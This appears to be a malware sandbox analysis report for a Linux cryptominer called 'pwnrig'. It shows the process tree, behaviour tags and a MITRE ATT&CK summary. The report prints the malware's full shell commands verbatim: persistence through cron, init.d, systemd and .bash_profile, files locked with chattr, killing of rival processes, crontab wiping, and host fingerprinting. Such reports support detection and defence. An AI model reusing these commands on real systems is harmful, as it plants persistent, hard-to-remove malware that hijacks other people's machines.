cp -f -r -- /tmp/service-agent /bin/sysdr
3⤵
- Writes file to system bin folder
PID:4515

/usr/bin/tee
tee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service
3⤵
- Modifies systemd
PID:4517

/usr/bin/sed
sed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service
3⤵
- Attempts to change immutable files
PID:4518

/usr/bin/chattr
chattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr
3⤵
PID:4519

/usr/bin/systemctl
systemctl enable pwnrige.service
3⤵
- Reads EFI boot settings
PID:4520

/usr/bin/systemctl
systemctl enable pwnrigl.service
3⤵
PID:4546

/usr/bin/systemctl
systemctl daemon-reload
3⤵
- Reads EFI boot settings
PID:4572

/usr/bin/systemctl
systemctl reload-or-restart pwnrige.service
3⤵
PID:4598

/usr/bin/hostname
hostname -I
1⤵
PID:4314

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:4316

/usr/bin/awk
awk "{print \"-\"\$2}"
1⤵
PID:4321

/usr/bin/head
head -n 1
1⤵
PID:4320

/usr/bin/grep
grep "Port "
1⤵
PID:4319

/usr/bin/cat
cat /etc/ssh/sshd_config
1⤵
PID:4318

/usr/bin/sed
sed -e "s/\$//"
1⤵
PID:4330

/usr/bin/sed
sed -e "s/^ *//"
1⤵
PID:4329

/usr/bin/cut
cut -d: -f2
1⤵
PID:4328

/usr/bin/grep
grep -m 1 "model name" /proc/cpuinfo
1⤵
- Checks CPU configuration
PID:4327

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:4333

/usr/bin/awk
awk "{print \$4}"
1⤵
PID:4336

/usr/bin/awk
awk "{print \$4}"
1⤵
PID:4339

/tmp/service-agent
/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d
1⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads hardware information
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:4653

/bin/sh
sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
2⤵
PID:4677

/usr/bin/whoami
whoami
3⤵
PID:4688

/usr/bin/hostname
hostname
3⤵
PID:4689

/usr/bin/grep
grep -c "^processor" /proc/cpuinfo
3⤵
- Checks CPU configuration
PID:4690

/bin/sh
sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
2⤵
PID:4706

/usr/bin/awk
awk "/[zZ]/ && !a[\$2]++ {print \$2}"
3⤵
PID:4708

/usr/bin/ps
ps -A "-ostat,ppid"
3⤵
PID:4707

/usr/bin/id
id -u
3⤵
PID:4710

/usr/bin/grep
grep -v grep
3⤵
PID:4713

/usr/bin/grep
grep /etc/cron
3⤵
PID:4712

/usr/bin/ps
ps x
3⤵
PID:4711

/bin/sh
sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
2⤵
PID:4715

/usr/bin/id
id -u
3⤵
PID:4716

/usr/bin/awk
awk "{if(\$3>30.0) print \$2}"
3⤵
PID:4721

/usr/bin/grep
grep -v /usr/sbin/httpd
3⤵
PID:4720

/usr/bin/grep
grep -v -- "-bash[[:space:]]*\$"
3⤵
PID:4719

/usr/bin/grep
grep -v grep
3⤵
PID:4718

/usr/bin/ps
ps aux
3⤵
PID:4717

/bin/sh
sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"
2⤵
PID:4723

/usr/bin/id
id -u
3⤵
PID:4724

/usr/bin/hostname
hostname -I
1⤵
PID:4680

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:4682

/usr/bin/awk
awk "{print \"-\"\$2}"
1⤵
PID:4687

/usr/bin/head
head -n 1
1⤵
PID:4686

/usr/bin/grep
grep "Port "
1⤵
PID:4685

/usr/bin/cat
cat /etc/ssh/sshd_config
1⤵
PID:4684

/usr/bin/cut
cut -d: -f2
1⤵
PID:4694

/usr/bin/grep
grep -m 1 "model name" /proc/cpuinfo
1⤵
- Checks CPU configuration
PID:4693

/usr/bin/sed
sed -e "s/\$//"
1⤵
PID:4696

/usr/bin/sed
sed -e "s/^ *//"
1⤵
PID:4695

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:4699

/usr/bin/awk
awk "{print \$4}"
1⤵
PID:4702

/usr/bin/awk
awk "{print \$4}"
1⤵
PID:4705

/usr/bin/wc
wc -l
1⤵
PID:4730

/usr/bin/awk
awk "{if(\$3>30.0) print \$2}"
1⤵
PID:4729

/usr/bin/grep
grep -- "-bash[[:space:]]*\$"
1⤵
PID:4728

/usr/bin/grep
grep -v grep
1⤵
PID:4727

/usr/bin/ps
ps aux
1⤵
- Reads CPU attributes
- Reads runtime system information
PID:4726

/usr/bin/crontab
crontab -r
1⤵
PID:4731

/usr/bin/pkill
pkill -f .klibsystem5
1⤵
- Reads CPU attributes
- Reads runtime system information
PID:4732

/usr/bin/pkill
pkill -f .klibsystem4
1⤵
- Reads CPU attributes
- Reads runtime system information
PID:4733

/usr/bin/bash
bash -c "echo \"* * * * * /usr/local/share/.klibsystem5 >/dev/null 2>&1\" | crontab -"
1⤵
PID:4734

/usr/bin/crontab
crontab -
2⤵
- Creates/modifies Cron job
PID:4736

/usr/bin/chattr
chattr -ia /etc/cron.d/.lib-knlib4
1⤵
PID:4737

/usr/bin/chattr
chattr +ia /etc/cron.d/.lib-knlib4
1⤵
PID:4738

/usr/bin/chattr
chattr -ia /var/spool/cron/.lib-knlib4
1⤵
PID:4739

/usr/bin/chattr
chattr +ia /var/spool/cron/.lib-knlib4
1⤵
PID:4740

/usr/bin/chattr
chattr -ia /etc/cron.hourly/.lib-knlib4
1⤵
PID:4741

/usr/bin/chattr
chattr +ia /etc/cron.hourly/.lib-knlib4
1⤵
PID:4742

/usr/bin/chattr
chattr -ia /etc/cron.daily/.lib-knlib4
1⤵
- Attempts to change immutable files
PID:4743

/usr/bin/chattr
chattr +ia /etc/cron.daily/.lib-knlib4
1⤵
- Attempts to change immutable files
PID:4744

/usr/bin/chattr
chattr -ia /etc/cron.weekly/.lib-knlib4
1⤵
PID:4745

/usr/bin/chattr
chattr +ia /etc/cron.weekly/.lib-knlib4
1⤵
PID:4746

/usr/bin/chattr
chattr -ia /etc/cron.monthly/.lib-knlib4
1⤵
PID:4747

/usr/bin/chattr
chattr +ia /etc/cron.monthly/.lib-knlib4
1⤵
PID:4748

/usr/bin/chattr
chattr -ia /etc/anacrontab
1⤵
PID:4749

/usr/bin/chattr
chattr +ia /etc/anacrontab
1⤵
PID:4750

/tmp/service-agent
/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn
1⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
PID:4751

/bin/sh
sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
2⤵
PID:4752

/usr/bin/whoami
whoami
3⤵
PID:4763

/usr/bin/hostname
hostname
3⤵
PID:4764

/usr/bin/grep
grep -c "^processor" /proc/cpuinfo
3⤵
- Checks CPU configuration
PID:4765

/bin/sh
sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
2⤵
PID:4781

/usr/bin/awk
awk "/[zZ]/ && !a[\$2]++ {print \$2}"
3⤵
PID:4783

/usr/bin/ps
ps -A "-ostat,ppid"
3⤵
- Reads CPU attributes
- Reads runtime system information
PID:4782

/usr/bin/id
id -u
3⤵
PID:4785

/usr/bin/grep
grep -v grep
3⤵
PID:4788

/usr/bin/grep
grep /etc/cron
3⤵
PID:4787

/usr/bin/ps
ps x
3⤵
PID:4786

/bin/sh
sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"
2⤵
- Writes file to tmp directory
PID:4790

/usr/bin/id
id -u
3⤵
PID:4791

/usr/bin/id
id -u
3⤵
PID:4792

/usr/bin/chattr
chattr -i -a /bin/bprofr "~/.bash_profile"
3⤵
PID:4793

/usr/bin/rm
rm -rf /bin/bprofr
3⤵
PID:4794

/usr/bin/sed
sed -i /bprofr/d "~/.bash_profile"
3⤵
- Attempts to change immutable files
PID:4795

/usr/bin/cp
cp -f -r -- /tmp/service-agent /bin/bprofr
3⤵
- Writes file to system bin folder
PID:4796

/usr/bin/id
id -u
3⤵
PID:4797

/usr/bin/chattr
chattr +i +a /bin/bprofr "~/.bash_profile"
3⤵
- Attempts to change immutable files
PID:4798

/usr/bin/mkdir
mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly
3⤵
PID:4799

/usr/bin/chattr
chattr -i -a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
3⤵
PID:4800

/usr/bin/hostname
hostname -I
1⤵
PID:4755

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:4757

/usr/bin/awk
awk "{print \"-\"\$2}"
1⤵
PID:4762

/usr/bin/head
head -n 1
1⤵
PID:4761

/usr/bin/grep
grep "Port "
1⤵
PID:4760

/usr/bin/cat
cat /etc/ssh/sshd_config
1⤵
PID:4759

/usr/bin/sed
sed -e "s/\$//"
1⤵
PID:4771

/usr/bin/sed
sed -e "s/^ *//"
1⤵
PID:4770

/usr/bin/cut
cut -d: -f2
1⤵
PID:4769

/usr/bin/grep
grep -m 1 "model name" /proc/cpuinfo
1⤵
- Checks CPU configuration
PID:4768

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:4774

/usr/bin/awk
awk "{print \$4}"
1⤵
PID:4777

/usr/bin/awk
awk "{print \$4}"
1⤵
PID:4780

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

Persistence

Scheduled Task/Job

Boot or Logon Autostart Execution

Hijack Execution Flow

Privilege Escalation

Scheduled Task/Job

Boot or Logon Autostart Execution

Hijack Execution Flow

Defense Evasion

Virtualization/Sandbox Evasion

Hijack Execution Flow

Credential Access

Discovery

Virtualization/Sandbox Evasion

System Information Discovery